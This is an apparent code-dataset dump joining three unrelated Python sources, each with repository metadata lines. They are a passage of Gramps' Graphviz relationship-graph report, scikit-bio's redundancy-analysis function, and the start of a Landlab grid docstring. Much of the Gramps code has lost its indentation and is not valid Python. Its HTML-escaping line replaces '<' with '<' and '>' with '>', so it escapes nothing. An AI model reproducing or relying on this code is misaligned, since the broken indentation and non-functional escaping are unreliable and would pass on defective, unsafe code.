        menu = options.menu
        get_option_by_name = options.menu.get_option_by_name
        get_value = lambda name: get_option_by_name(name).get_value()

        # set up the locale first; the living-people handling below
        # is passed this locale
        lang = menu.get_option_by_name('trans').get_value()
        self._locale = self.set_locale(lang)

        stdoptions.run_private_data_option(self, menu)
        stdoptions.run_living_people_option(self, menu, self._locale)
        # wrap the (possibly proxied) database in a read cache
        self.database = CacheProxyDb(self.database)
        self._db = self.database

        self.includeid = get_value('incid')
        self.includeurl = get_value('url')
        self.includeimg = get_value('includeImages')
        self.imgpos = get_value('imageOnTheSide')
        self.use_roundedcorners = get_value('useroundedcorners')
        self.adoptionsdashed = get_value('dashed')
        self.show_families = get_value('showfamily')
        self.use_subgraphs = get_value('usesubgraphs')
        self.event_choice = get_value('event_choice')
        self.occupation = get_value('occupation')
        # toggled per-person in add_persons_and_families()
        self.use_html_output = False

        self.colorize = get_value('color')
        color_males = get_value('colormales')
        color_females = get_value('colorfemales')
        color_unknown = get_value('colorunknown')
        color_families = get_value('colorfamilies')
        self.colors = {
            'male': color_males,
            'female': color_females,
            'unknown': color_unknown,
            'family': color_families
        }

        # 'd' in the arrow option means heads point to descendants,
        # 'a' means tails point to ancestors
        arrow_str = get_value('arrow')
        if 'd' in arrow_str:
            self.arrowheadstyle = 'normal'
        else:
            self.arrowheadstyle = 'none'
        if 'a' in arrow_str:
            self.arrowtailstyle = 'normal'
        else:
            self.arrowtailstyle = 'none'

        filter_option = get_option_by_name('filter')
        self._filter = filter_option.get_filter()

        stdoptions.run_name_format_option(self, menu)

        pid = get_value('pid')
        self.center_person = self._db.get_person_from_gramps_id(pid)
        if self.center_person is None:
            raise ReportError(_("Person %s is not in the Database") % pid)

        self.increlname = get_value('increlname')
        if self.increlname:
            self.rel_calc = get_relationship_calculator(reinit=True,
                                                        clocale=self._locale)

        # the 'advrelinfo' option only exists in debug builds
        # (see RelGraphOptions.add_menu_options)
        if __debug__:
            self.advrelinfo = get_value('advrelinfo')
        else:
            self.advrelinfo = False
def write_report(self):
person_handles = self._filter.apply(self._db,
self._db.iter_person_handles())
if len(person_handles) > 1:
if self._user:
self._user.begin_progress(_("Relationship Graph"),
_("Generating report"),
len(person_handles) * 2)
self.add_persons_and_families(person_handles)
self.add_child_links_to_families(person_handles)
if self._user:
self._user.end_progress()
def add_child_links_to_families(self, person_handles):
"""
returns string of Graphviz edges linking parents to families or
children
"""
# Hash people in a dictionary for faster inclusion checking
person_dict = dict([handle, 1] for handle in person_handles)
for person_handle in person_handles:
if self._user:
self._user.step_progress()
person = self._db.get_person_from_handle(person_handle)
p_id = person.get_gramps_id()
for fam_handle in person.get_parent_family_handle_list():
family = self._db.get_family_from_handle(fam_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
for child_ref in family.get_child_ref_list():
if child_ref.ref == person_handle:
frel = child_ref.frel
mrel = child_ref.mrel
break
if (self.show_families and
((father_handle and father_handle in person_dict) or
(mother_handle and mother_handle in person_dict))):
# Link to the family node if either parent is in graph
self.add_family_link(p_id, family, frel, mrel)
else:
# Link to the parents' nodes directly, if they are in graph
if father_handle and father_handle in person_dict:
self.add_parent_link(p_id, father_handle, frel)
if mother_handle and mother_handle in person_dict:
self.add_parent_link(p_id, mother_handle, mrel)
def add_family_link(self, p_id, family, frel, mrel):
"Links the child to a family"
style = 'solid'
adopted = ((int(frel) != ChildRefType.BIRTH) or
(int(mrel) != ChildRefType.BIRTH))
# If birth relation to father is NONE, meaning there is no father and
# if birth relation to mother is BIRTH then solid line
if (int(frel) == ChildRefType.NONE and
int(mrel) == ChildRefType.BIRTH):
adopted = False
if adopted and self.adoptionsdashed:
style = 'dotted'
self.doc.add_link(family.get_gramps_id(), p_id, style,
self.arrowheadstyle, self.arrowtailstyle)
def add_parent_link(self, p_id, parent_handle, rel):
"Links the child to a parent"
style = 'solid'
if (int(rel) != ChildRefType.BIRTH) and self.adoptionsdashed:
style = 'dotted'
parent = self._db.get_person_from_handle(parent_handle)
self.doc.add_link(parent.get_gramps_id(), p_id, style,
self.arrowheadstyle, self.arrowtailstyle)
    def add_persons_and_families(self, person_handles):
        "adds nodes for persons and their families"
        # variable to communicate with get_person_label
        self.use_html_output = False

        # The list of families for which we have output the node,
        # so we don't do it twice
        families_done = {}
        for person_handle in person_handles:
            if self._user:
                self._user.step_progress()
            # determine per person if we use HTML style label
            if self.includeimg:
                self.use_html_output = True
            person = self._db.get_person_from_handle(person_handle)
            if person is None:
                continue
            p_id = person.get_gramps_id()
            # Output the person's node
            label = self.get_person_label(person)
            (shape, style, color, fill) = self.get_gender_style(person)
            url = ""
            if self.includeurl:
                # mirror the "ppl/<last char>/<second-to-last char>/"
                # directory layout used by the Narrated Web Site report
                phan = person_handle
                dirpath = "ppl/%s/%s" % (phan[-1], phan[-2])
                dirpath = dirpath.lower()
                url = "%s/%s.html" % (dirpath, phan)
            self.doc.add_node(p_id, label, shape, color, style, fill, url)

            # Output families where person is a parent
            if self.show_families:
                family_list = person.get_family_handle_list()
                for fam_handle in family_list:
                    family = self._db.get_family_from_handle(fam_handle)
                    if family is None:
                        continue
                    if fam_handle not in families_done:
                        families_done[fam_handle] = 1
                        self.__add_family(fam_handle)
                    # If subgraphs are not chosen then each parent is linked
                    # separately to the family. This gives Graphviz greater
                    # control over the layout of the whole graph but
                    # may leave spouses not positioned together.
                    if not self.use_subgraphs:
                        self.doc.add_link(p_id, family.get_gramps_id(), "",
                                          self.arrowheadstyle,
                                          self.arrowtailstyle)
    def __add_family(self, fam_handle):
        """Add a node for a family and optionally link the spouses to it"""
        fam = self._db.get_family_from_handle(fam_handle)
        if fam is None:
            return
        fam_id = fam.get_gramps_id()

        # collect the marriage and divorce event data (if any); only
        # FAMILY or PRIMARY roles count, and the loop stops at the first
        # matching event of either kind
        m_type = m_date = m_place = ""
        d_type = d_date = d_place = ""
        for event_ref in fam.get_event_ref_list():
            event = self._db.get_event_from_handle(event_ref.ref)
            if event is None:
                continue
            if (event.type == EventType.MARRIAGE and
                    (event_ref.get_role() == EventRoleType.FAMILY or
                     event_ref.get_role() == EventRoleType.PRIMARY)):
                m_type = event.type
                m_date = self.get_date_string(event)
                # event_choice 3 means "places only if no dates"
                if not (self.event_choice == 3 and m_date):
                    m_place = self.get_place_string(event)
                break
            if (event.type == EventType.DIVORCE and
                    (event_ref.get_role() == EventRoleType.FAMILY or
                     event_ref.get_role() == EventRoleType.PRIMARY)):
                d_type = event.type
                d_date = self.get_date_string(event)
                if not (self.event_choice == 3 and d_date):
                    d_place = self.get_place_string(event)
                break

        labellines = list()
        if self.includeid == 2:
            # id on separate line
            labellines.append("(%s)" % fam_id)
        if self.event_choice == 7:
            # dates and places on the same line, preceded by the
            # event type's abbreviation
            if m_type:
                line = m_type.get_abbreviation()
                if m_date:
                    line += ' %s' % m_date
                if m_date and m_place:
                    labellines.append(line)
                    line = ''
                if m_place:
                    line += ' %s' % m_place
                labellines.append(line)
            if d_type:
                line = d_type.get_abbreviation()
                if d_date:
                    line += ' %s' % d_date
                if d_date and d_place:
                    labellines.append(line)
                    line = ''
                if d_place:
                    line += ' %s' % d_place
                labellines.append(line)
        else:
            if m_date:
                labellines.append("(%s)" % m_date)
            if m_place:
                labellines.append("(%s)" % m_place)
        label = "\\n".join(labellines)

        labellines = list()
        if self.includeid == 1:
            # id on same line
            labellines.append("(%s)" % fam_id)
        if len(label):
            labellines.append(label)
        label = ' '.join(labellines)

        color = ""
        fill = ""
        style = "solid"
        if self.colorize == 'colored':
            color = self.colors['family']
        elif self.colorize == 'filled':
            fill = self.colors['family']
            style = "filled"
        self.doc.add_node(fam_id, label, "ellipse", color, style, fill)

        # If subgraphs are used then we add both spouses here and Graphviz
        # will attempt to position both spouses closely together.
        # TODO: A person who is a parent in more than one family may only be
        #       positioned next to one of their spouses. The code currently
        #       does not take into account multiple spouses.
        if self.use_subgraphs:
            self.doc.start_subgraph(fam_id)
            f_handle = fam.get_father_handle()
            m_handle = fam.get_mother_handle()
            if f_handle:
                father = self._db.get_person_from_handle(f_handle)
                self.doc.add_link(father.get_gramps_id(),
                                  fam_id, "",
                                  self.arrowheadstyle,
                                  self.arrowtailstyle)
            if m_handle:
                mother = self._db.get_person_from_handle(m_handle)
                self.doc.add_link(mother.get_gramps_id(),
                                  fam_id, "",
                                  self.arrowheadstyle,
                                  self.arrowtailstyle)
            self.doc.end_subgraph()
def get_gender_style(self, person):
"return gender specific person style"
gender = person.get_gender()
shape = "box"
style = "solid"
color = ""
fill = ""
if gender == person.FEMALE and self.use_roundedcorners:
style = "rounded"
elif gender == person.UNKNOWN:
shape = "hexagon"
if person == self.center_person and self.increlname:
shape = "octagon"
if self.colorize == 'colored':
if gender == person.MALE:
color = self.colors['male']
elif gender == person.FEMALE:
color = self.colors['female']
else:
color = self.colors['unknown']
elif self.colorize == 'filled':
style += ",filled"
if gender == person.MALE:
fill = self.colors['male']
elif gender == person.FEMALE:
fill = self.colors['female']
else:
fill = self.colors['unknown']
return(shape, style, color, fill)
def get_person_label(self, person):
"return person label string"
# see if we have an image to use for this person
image_path = None
if self.use_html_output:
media_list = person.get_media_list()
if len(media_list) > 0:
media_handle = media_list[0].get_reference_handle()
media = self._db.get_media_from_handle(media_handle)
media_mime_type = media.get_mime_type()
if media_mime_type[0:5] == "image":
image_path = get_thumbnail_path(
media_path_full(self._db, media.get_path()),
rectangle=media_list[0].get_rectangle())
# test if thumbnail actually exists in thumbs
# (import of data means media files might not be present
image_path = find_file(image_path)
label = ""
line_delimiter = '\\n'
# If we have an image, then start an HTML table; remember to close
# the table afterwards!
#
# This isn't a free-form HTML format here...just a few keywords that
# happen to be
# similar to keywords commonly seen in HTML. For additional
# information on what
# is allowed, see:
#
# http://www.graphviz.org/info/shapes.html#html
#
if self.use_html_output and image_path:
line_delimiter = '<BR/>'
label += '<TABLE BORDER="0" CELLSPACING="2" CELLPADDING="0" '
label += 'CELLBORDER="0"><TR><TD></TD><TD>'
label += '<IMG SRC="%s"/></TD><TD></TD>' % image_path
if self.imgpos == 0:
#trick it into not stretching the image
label += '</TR><TR><TD COLSPAN="3">'
else:
label += '<TD>'
else:
#no need for html label with this person
self.use_html_output = False
# at the very least, the label must have the person's name
p_name = self._name_display.display(person)
if self.use_html_output:
# avoid < and > in the name, as this is html text
label += p_name.replace('<', '<').replace('>', '>')
else:
label += p_name
p_id = person.get_gramps_id()
if self.includeid == 1: # same line
label += " (%s)" % p_id
elif self.includeid == 2: # own line
label += "%s(%s)" % (line_delimiter, p_id)
if self.event_choice != 0:
b_date, d_date, b_place, d_place, b_type, d_type = \
self.get_event_strings(person)
if self.event_choice in [1, 2, 3, 4, 5] and (b_date or d_date):
label += '%s(' % line_delimiter
if b_date:
label += '%s' % b_date
label += ' - '
if d_date:
label += '%s' % d_date
label += ')'
if (self.event_choice in [2, 3, 5, 6] and
(b_place or d_place) and
not (self.event_choice == 3 and (b_date or d_date))
):
label += '%s(' % line_delimiter
if b_place:
label += '%s' % b_place
label += ' - '
if d_place:
label += '%s' % d_place
label += ')'
if self.event_choice == 7:
if b_type:
label += '%s%s' % (line_delimiter, b_type.get_abbreviation())
if b_date:
label += ' %s' % b_date
if b_place:
label += ' %s' % b_place
if d_type:
label += '%s%s' % (line_delimiter, d_type.get_abbreviation())
if d_date:
label += ' %s' % d_date
if d_place:
label += ' %s' % d_place
if self.increlname and self.center_person != person:
# display relationship info
if self.advrelinfo:
(relationship, _ga, _gb) = self.rel_calc.get_one_relationship(
self._db, self.center_person, person,
extra_info=True, olocale=self._locale)
if relationship:
label += "%s(%s Ga=%d Gb=%d)" % (line_delimiter,
relationship, _ga, _gb)
else:
relationship = self.rel_calc.get_one_relationship(
self._db, self.center_person, person,
olocale=self._locale)
if relationship:
label += "%s(%s)" % (line_delimiter, relationship)
if self.occupation > 0:
event_refs = person.get_primary_event_ref_list()
events = [event for event in
[self._db.get_event_from_handle(ref.ref)
for ref in event_refs]
if event.get_type() == EventType(EventType.OCCUPATION)]
if len(events) > 0:
events.sort(key=lambda x: x.get_date_object())
if self.occupation == 1:
occupation = events[-1].get_description()
if occupation:
label += "%s(%s)" % (line_delimiter, occupation)
elif self.occupation == 2:
for evt in events:
date = self.get_date_string(evt)
place = self.get_place_string(evt)
desc = evt.get_description()
if not date and not desc and not place:
continue
label += '%s(' % line_delimiter
if date:
label += '%s' % date
if desc:
label += ' '
if desc:
label += '%s' % desc
if place:
if date or desc:
label += ', '
label += '%s' % place
label += ')'
# see if we have a table that needs to be terminated
if self.use_html_output:
label += '</TD></TR></TABLE>'
return label
else:
# non html label is enclosed by "" so escape other "
return label.replace('"', '\\\"')
def get_event_strings(self, person):
"returns tuple of birth/christening and death/burying date strings"
birth_date = birth_place = death_date = death_place = ""
birth_type = death_type = ""
birth_event = get_birth_or_fallback(self._db, person)
if birth_event:
birth_type = birth_event.type
birth_date = self.get_date_string(birth_event)
birth_place = self.get_place_string(birth_event)
death_event = get_death_or_fallback(self._db, person)
if death_event:
death_type = death_event.type
death_date = self.get_date_string(death_event)
death_place = self.get_place_string(death_event)
return (birth_date, death_date, birth_place,
death_place, birth_type, death_type)
def get_date_string(self, event):
"""
return date string for an event label.
Based on the data availability and preferences, we select one
of the following for a given event:
year only
complete date
empty string
"""
if event and event.get_date_object() is not None:
event_date = event.get_date_object()
if event_date.get_year_valid():
if self.event_choice in [4, 5]:
return '%i' % event_date.get_year()
elif self.event_choice in [1, 2, 3, 7]:
return self._get_date(event_date)
return ''
def get_place_string(self, event):
"""
return place string for an event label.
Based on the data availability and preferences, we select one
of the following for a given event:
place name
empty string
"""
if event and self.event_choice in [2, 3, 5, 6, 7]:
return _pd.display_event(self._db, event)
return ''
#------------------------------------------------------------------------
#
# RelGraphOptions class
#
#------------------------------------------------------------------------
class RelGraphOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
    def __init__(self, name, dbase):
        """Initialize option placeholders; the actual menu widgets are
        created later in add_menu_options()."""
        self.__pid = None             # PersonOption: center person
        self.__filter = None          # FilterOption: person filter
        self.__show_relships = None   # BooleanOption: show relationships
        self.__show_ga_gb = None      # BooleanOption: Ga/Gb debug (debug only)
        self.__include_images = None  # BooleanOption: thumbnails
        self.__image_on_side = None   # EnumeratedListOption: image position
        self.__db = dbase
        self._nf = None               # name-format option
        self.event_choice = None      # EnumeratedListOption: dates/places
        MenuReportOptions.__init__(self, name, dbase)
    def add_menu_options(self, menu):
        """Build the report's options in three categories:
        Report Options, Include, and Graph Style."""
        ################################
        category_name = _("Report Options")
        add_option = partial(menu.add_option, category_name)
        ################################
        self.__filter = FilterOption(_("Filter"), 0)
        self.__filter.set_help(
            _("Determines what people are included in the graph"))
        add_option("filter", self.__filter)
        self.__filter.connect('value-changed', self.__filter_changed)

        self.__pid = PersonOption(_("Center Person"))
        self.__pid.set_help(_("The center person for the report"))
        menu.add_option(category_name, "pid", self.__pid)
        self.__pid.connect('value-changed', self.__update_filters)

        self._nf = stdoptions.add_name_format_option(menu, category_name)
        self._nf.connect('value-changed', self.__update_filters)

        self.__update_filters()

        stdoptions.add_private_data_option(menu, category_name)
        stdoptions.add_living_people_option(menu, category_name)
        stdoptions.add_localization_option(menu, category_name)

        ################################
        add_option = partial(menu.add_option, _("Include"))
        ################################
        self.event_choice = EnumeratedListOption(_('Dates and/or Places'), 0)
        self.event_choice.add_item(0, _('Do not include any dates or places'))
        self.event_choice.add_item(1, _('Include (birth, marriage, death) '
                                        'dates, but no places'))
        self.event_choice.add_item(2, _('Include (birth, marriage, death) '
                                        'dates, and places'))
        self.event_choice.add_item(3, _('Include (birth, marriage, death) '
                                        'dates, and places if no dates'))
        self.event_choice.add_item(4, _('Include (birth, marriage, death) '
                                        'years, but no places'))
        self.event_choice.add_item(5, _('Include (birth, marriage, death) '
                                        'years, and places'))
        self.event_choice.add_item(6, _('Include (birth, marriage, death) '
                                        'places, but no dates'))
        self.event_choice.add_item(7, _('Include (birth, marriage, death) '
                                        'dates and places on same line'))
        self.event_choice.set_help(
            _("Whether to include dates and/or places"))
        add_option("event_choice", self.event_choice)

        url = BooleanOption(_("Include URLs"), False)
        url.set_help(_("Include a URL in each graph node so "
                       "that PDF and imagemap files can be "
                       "generated that contain active links "
                       "to the files generated by the 'Narrated "
                       "Web Site' report."))
        add_option("url", url)

        include_id = EnumeratedListOption(_('Include Gramps ID'), 0)
        include_id.add_item(0, _('Do not include'))
        include_id.add_item(1, _('Share an existing line'))
        include_id.add_item(2, _('On a line of its own'))
        include_id.set_help(_("Whether (and where) to include Gramps IDs"))
        add_option("incid", include_id)

        self.__show_relships = BooleanOption(
            _("Include relationship to center person"), False)
        self.__show_relships.set_help(_("Whether to show every person's "
                                        "relationship to the center person"))
        add_option("increlname", self.__show_relships)
        self.__show_relships.connect('value-changed',
                                     self.__show_relships_changed)

        self.__include_images = BooleanOption(
            _('Include thumbnail images of people'), False)
        self.__include_images.set_help(
            _("Whether to include thumbnails of people."))
        add_option("includeImages", self.__include_images)
        self.__include_images.connect('value-changed', self.__image_changed)

        self.__image_on_side = EnumeratedListOption(_("Thumbnail Location"), 0)
        self.__image_on_side.add_item(0, _('Above the name'))
        self.__image_on_side.add_item(1, _('Beside the name'))
        self.__image_on_side.set_help(
            _("Where the thumbnail image should appear relative to the name"))
        add_option("imageOnTheSide", self.__image_on_side)

        #occupation = BooleanOption(_("Include occupation"), False)
        occupation = EnumeratedListOption(_('Include occupation'), 0)
        occupation.add_item(0, _('Do not include any occupation'))
        occupation.add_item(1, _('Include description '
                                 'of most recent occupation'))
        occupation.add_item(2, _('Include date, description and place '
                                 'of all occupations'))
        occupation.set_help(_("Whether to include the last occupation"))
        add_option("occupation", occupation)

        # the Ga/Gb relationship-debugging option only exists in
        # debug builds; RelGraphReport.__init__ mirrors this check
        if __debug__:
            self.__show_ga_gb = BooleanOption(_("Include relationship "
                                                "debugging numbers also"),
                                              False)
            self.__show_ga_gb.set_help(_("Whether to include 'Ga' and 'Gb' "
                                         "also, to debug the relationship "
                                         "calculator"))
            add_option("advrelinfo", self.__show_ga_gb)

        ################################
        add_option = partial(menu.add_option, _("Graph Style"))
        ################################
        color = EnumeratedListOption(_("Graph coloring"), 'filled')
        for i in range(0, len(_COLORS)):
            color.add_item(_COLORS[i]["value"], _COLORS[i]["name"])
        color.set_help(_("Males will be shown with blue, females "
                         "with red. If the sex of an individual "
                         "is unknown it will be shown with gray."))
        add_option("color", color)

        color_males = ColorOption(_('Males'), '#e0e0ff')
        color_males.set_help(_('The color to use to display men.'))
        add_option('colormales', color_males)

        color_females = ColorOption(_('Females'), '#ffe0e0')
        color_females.set_help(_('The color to use to display women.'))
        add_option('colorfemales', color_females)

        color_unknown = ColorOption(_('Unknown'), '#e0e0e0')
        color_unknown.set_help(
            _('The color to use when the gender is unknown.')
        )
        add_option('colorunknown', color_unknown)

        color_family = ColorOption(_('Families'), '#ffffe0')
        color_family.set_help(_('The color to use to display families.'))
        add_option('colorfamilies', color_family)

        arrow = EnumeratedListOption(_("Arrowhead direction"), 'd')
        for i in range(0, len(_ARROWS)):
            arrow.add_item(_ARROWS[i]["value"], _ARROWS[i]["name"])
        arrow.set_help(_("Choose the direction that the arrows point."))
        add_option("arrow", arrow)

        # see bug report #2180
        roundedcorners = BooleanOption(_("Use rounded corners"), False)
        roundedcorners.set_help(_("Use rounded corners to differentiate "
                                  "between women and men."))
        add_option("useroundedcorners", roundedcorners)

        dashed = BooleanOption(
            _("Indicate non-birth relationships with dotted lines"), True)
        dashed.set_help(_("Non-birth relationships will show up "
                          "as dotted lines in the graph."))
        add_option("dashed", dashed)

        showfamily = BooleanOption(_("Show family nodes"), True)
        showfamily.set_help(_("Families will show up as ellipses, linked "
                              "to parents and children."))
        add_option("showfamily", showfamily)
def __update_filters(self):
"""
Update the filter list based on the selected person
"""
gid = self.__pid.get_value()
person = self.__db.get_person_from_gramps_id(gid)
nfv = self._nf.get_value()
filter_list = utils.get_person_filters(person,
include_single=False,
name_format=nfv)
self.__filter.set_filters(filter_list)
def __filter_changed(self):
"""
Handle filter change. If the filter is not specific to a person,
disable the person option
"""
if self.__show_relships and self.__show_relships.get_value():
self.__pid.set_available(True)
filter_value = self.__filter.get_value()
if filter_value == 0: # "Entire Database" (as "include_single=False")
self.__pid.set_available(False)
else:
# The other filters need a center person (assume custom ones too)
self.__pid.set_available(True)
def __image_changed(self):
"""
Handle thumbnail change. If the image is not to be included, make the
image location option unavailable.
"""
self.__image_on_side.set_available(self.__include_images.get_value())
def __show_relships_changed(self):
"""
Enable/disable menu items if relationships are required
"""
if self.__show_ga_gb:
self.__show_ga_gb.set_available(self.__show_relships.get_value())
self.__filter_changed()
|
beernarrd/gramps
|
gramps/plugins/graph/gvrelgraph.py
|
Python
|
gpl-2.0
| 37,619
|
[
"Brian"
] |
5779e36b93f9b2f6cd7111383624f2a3bdd5700e73aab54fcc36fd00948b5fc4
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
import numpy as np
import pandas as pd
from scipy.linalg import svd, lstsq
from skbio.util._decorator import experimental
from ._ordination_results import OrdinationResults
from ._utils import corr, svd_rank, scale
@experimental(as_of="0.4.0")
def rda(y, x, scale_Y=False, scaling=1):
    r"""Compute redundancy analysis, a type of canonical analysis.

    It is related to PCA and multiple regression because the explained
    variables `y` are fitted to the explanatory variables `x` and PCA
    is then performed on the fitted values. A similar process is
    performed on the residuals.

    RDA should be chosen if the studied gradient is small, and CCA
    when it's large, so that the contingency table is sparse.

    Parameters
    ----------
    y : pd.DataFrame
        :math:`n \times p` response matrix, where :math:`n` is the number
        of samples and :math:`p` is the number of features. Its columns
        need be dimensionally homogeneous (or you can set `scale_Y=True`).
        This matrix is also referred to as the community matrix that
        commonly stores information about species abundances
    x : pd.DataFrame
        :math:`n \times m, n \geq m` matrix of explanatory
        variables, where :math:`n` is the number of samples and
        :math:`m` is the number of metadata variables. Its columns
        need not be standardized, but doing so turns regression
        coefficients into standard regression coefficients.
    scale_Y : bool, optional
        Controls whether the response matrix columns are scaled to
        have unit standard deviation. Defaults to `False`.
    scaling : int
        Scaling type 1 produces a distance biplot. It focuses on
        the ordination of rows (samples) because their transformed
        distances approximate their original euclidean
        distances. Especially interesting when most explanatory
        variables are binary.

        Scaling type 2 produces a correlation biplot. It focuses
        on the relationships among explained variables (`y`). It
        is interpreted like scaling type 1, but taking into
        account that distances between objects don't approximate
        their euclidean distances.

        See more details about distance and correlation biplots in
        [1]_, \S 9.1.4.

    Returns
    -------
    OrdinationResults
        Object that stores the computed eigenvalues, the
        proportion explained by each of them (per unit),
        transformed coordinates for feature and samples, biplot
        scores, sample constraints, etc.

    Raises
    ------
    ValueError
        If the two data matrices don't have the same number of rows,
        or if there are fewer samples than explanatory variables.
    NotImplementedError
        If `scaling` is not 1 or 2.

    See Also
    --------
    ca
    cca
    OrdinationResults

    Notes
    -----
    The algorithm is based on [1]_, \S 11.1, and is expected to
    give the same results as ``rda(y, x)`` in R's package vegan.
    The eigenvalues reported in vegan are re-normalized to
    :math:`\sqrt{\frac{s}{n-1}}`, where `n` is the number of samples,
    and `s` is the original eigenvalues. Here we will only return
    the original eigenvalues, as recommended in [1]_.

    References
    ----------
    .. [1] Legendre P. and Legendre L. 1998. Numerical
       Ecology. Elsevier, Amsterdam.
    """
    # NOTE: ``DataFrame.as_matrix()`` was deprecated in pandas 0.23 and
    # removed in pandas 1.0; ``.values`` is the portable equivalent.
    Y = y.values
    X = x.values

    n, p = y.shape
    n_, m = x.shape
    if n != n_:
        raise ValueError(
            "Both data matrices must have the same number of rows.")
    if n < m:
        # Mmm actually vegan is able to do this case, too
        raise ValueError(
            "Explanatory variables cannot have less rows than columns.")

    sample_ids = y.index
    feature_ids = y.columns
    # Centre response variables (they must be dimensionally
    # homogeneous)
    Y = scale(Y, with_std=scale_Y)
    # Centre explanatory variables
    X = scale(X, with_std=False)

    # Distribution of variables should be examined and transformed
    # if necessary (see paragraph 4 in p. 580 L&L 1998)
    # Compute Y_hat (fitted values by multivariate linear
    # regression, that is, linear least squares). Formula 11.6 in
    # L&L 1998 involves solving the normal equations, but that fails
    # when cond(X) ~ eps**(-0.5). A more expensive but much more
    # stable solution (fails when cond(X) ~ eps**-1) is computed
    # using the QR decomposition of X = QR:
    # (11.6) Y_hat = X [X' X]^{-1} X' Y
    #              = QR [R'Q' QR]^{-1} R'Q' Y
    #              = QR [R' R]^{-1} R'Q' Y
    #              = QR R^{-1} R'^{-1} R' Q' Y
    #              = Q Q' Y
    # and B (matrix of regression coefficients)
    # (11.4) B = [X' X]^{-1} X' Y
    #          = R^{-1} R'^{-1} R' Q' Y
    #          = R^{-1} Q'
    # Q, R = np.linalg.qr(X)
    # Y_hat = Q.dot(Q.T).dot(Y)
    # B = scipy.linalg.solve_triangular(R, Q.T.dot(Y))
    # This works provided X has full rank. When not, you can still
    # fix it using R's pseudoinverse or partitioning R. To avoid any
    # issues, like the numerical instability when trying to
    # reproduce an example in L&L where X was rank-deficient, we'll
    # just use `np.linalg.lstsq`, which uses the SVD decomposition
    # under the hood and so it's also more expensive.
    B, _, rank_X, _ = lstsq(X, Y)
    Y_hat = X.dot(B)
    # Now let's perform PCA on the fitted values from the multiple
    # regression
    u, s, vt = svd(Y_hat, full_matrices=False)
    # vt are the right eigenvectors, which is what we need to
    # perform PCA. That is, we're changing points in Y_hat from the
    # canonical basis to the orthonormal basis given by the right
    # eigenvectors of Y_hat (or equivalently, the eigenvectors of
    # the covariance matrix Y_hat.T.dot(Y_hat))
    # See 3) in p. 583 in L&L 1998
    rank = svd_rank(Y_hat.shape, s)
    # Theoretically, there're at most min(p, m, n - 1) non-zero eigenvalues

    U = vt[:rank].T  # U as in Fig. 11.2

    # Ordination in the space of response variables. Its columns are
    # sample scores. (Eq. 11.12)
    F = Y.dot(U)
    # Ordination in the space of explanatory variables. Its columns
    # are fitted sample scores. (Eq. 11.13)
    Z = Y_hat.dot(U)

    # Canonical coefficients (formula 11.14)
    # C = B.dot(U)  # Not used

    Y_res = Y - Y_hat
    # PCA on the residuals
    u_res, s_res, vt_res = svd(Y_res, full_matrices=False)
    # See 9) in p. 587 in L&L 1998
    rank_res = svd_rank(Y_res.shape, s_res)
    # Theoretically, there're at most min(p, n - 1) non-zero eigenvalues as

    U_res = vt_res[:rank_res].T
    F_res = Y_res.dot(U_res)  # Ordination in the space of residuals

    eigenvalues = np.r_[s[:rank], s_res[:rank_res]]

    # Compute scores
    if scaling not in {1, 2}:
        raise NotImplementedError("Only scalings 1, 2 available for RDA.")
    # According to the vegan-FAQ.pdf, the scaling factor for scores
    # is (notice that L&L 1998 says in p. 586 that such scaling
    # doesn't affect the interpretation of a biplot):
    pc_ids = ['RDA%d' % (i+1) for i in range(len(eigenvalues))]
    eigvals = pd.Series(eigenvalues, index=pc_ids)
    const = np.sum(eigenvalues**2)**0.25
    if scaling == 1:
        scaling_factor = const
    elif scaling == 2:
        scaling_factor = eigenvalues / const
    feature_scores = np.hstack((U, U_res)) * scaling_factor
    sample_scores = np.hstack((F, F_res)) / scaling_factor

    feature_scores = pd.DataFrame(feature_scores,
                                  index=feature_ids,
                                  columns=pc_ids)
    sample_scores = pd.DataFrame(sample_scores,
                                 index=sample_ids,
                                 columns=pc_ids)
    # TODO not yet used/displayed
    sample_constraints = pd.DataFrame(np.hstack((Z, F_res)) / scaling_factor,
                                      index=sample_ids,
                                      columns=pc_ids)
    # Vegan seems to compute them as corr(X[:, :rank_X],
    # u) but I don't think that's a good idea. In fact, if
    # you take the example shown in Figure 11.3 in L&L 1998 you
    # can see that there's an arrow for each of the 4
    # environmental variables (depth, coral, sand, other) even if
    # other = not(coral or sand)
    biplot_scores = corr(X, u)
    biplot_scores = pd.DataFrame(biplot_scores,
                                 index=x.columns,
                                 columns=pc_ids[:biplot_scores.shape[1]])
    # The "Correlations of environmental variables with sample
    # scores" from table 11.4 are quite similar to vegan's biplot
    # scores, but they're computed like this:
    #   corr(X, F))
    p_explained = pd.Series(eigenvalues / eigenvalues.sum(), index=pc_ids)
    return OrdinationResults('RDA', 'Redundancy Analysis',
                             eigvals=eigvals,
                             proportion_explained=p_explained,
                             features=feature_scores,
                             samples=sample_scores,
                             biplot_scores=biplot_scores,
                             sample_constraints=sample_constraints)
|
kdmurray91/scikit-bio
|
skbio/stats/ordination/_redundancy_analysis.py
|
Python
|
bsd-3-clause
| 9,325
|
[
"scikit-bio"
] |
fd341fc4ef22ab7a0ccc055d114a0d57dfaac64a5c655262218ac6fd45900731
|
#! /usr/env/python
"""
Python implementation of VoronoiDelaunayGrid, a class used to create and manage
unstructured, irregular grids for 2D numerical models.
Getting Information about a Grid
--------------------------------
The following attributes, properties, and methods provide data about the grid,
its geometry, and the connectivity among the various elements. Each grid
element has an ID number, which is also its position in an array that
contains information about that type of element. For example, the *x*
coordinate of node 5 would be found at `grid.node_x[5]`.
The naming of grid-element arrays is *attribute*`_at_`*element*, where
*attribute* is the name of the data in question, and *element* is the element
to which the attribute applies. For example, the property `node_at_cell`
contains the ID of the node associated with each cell. For example,
`node_at_cell[3]` contains the *node ID* of the node associated with cell 3.
The *attribute* is singular if there is only one value per element; for
example, there is only one node associated with each cell. It is plural when
there are multiple values per element; for example, the `faces_at_cell` array
contains multiple faces for each cell. Exceptions to these general rules are
functions that return indices of a subset of all elements of a particular type.
For example, you can obtain an array with IDs of only the core nodes using
`core_nodes`, while `active_links` provides an array of IDs of active links
(only). Finally, attributes that represent a measurement of something, such as
the length of a link or the surface area of a cell, are described using `_of_`,
as in the example `area_of_cell`.
Information about the grid as a whole
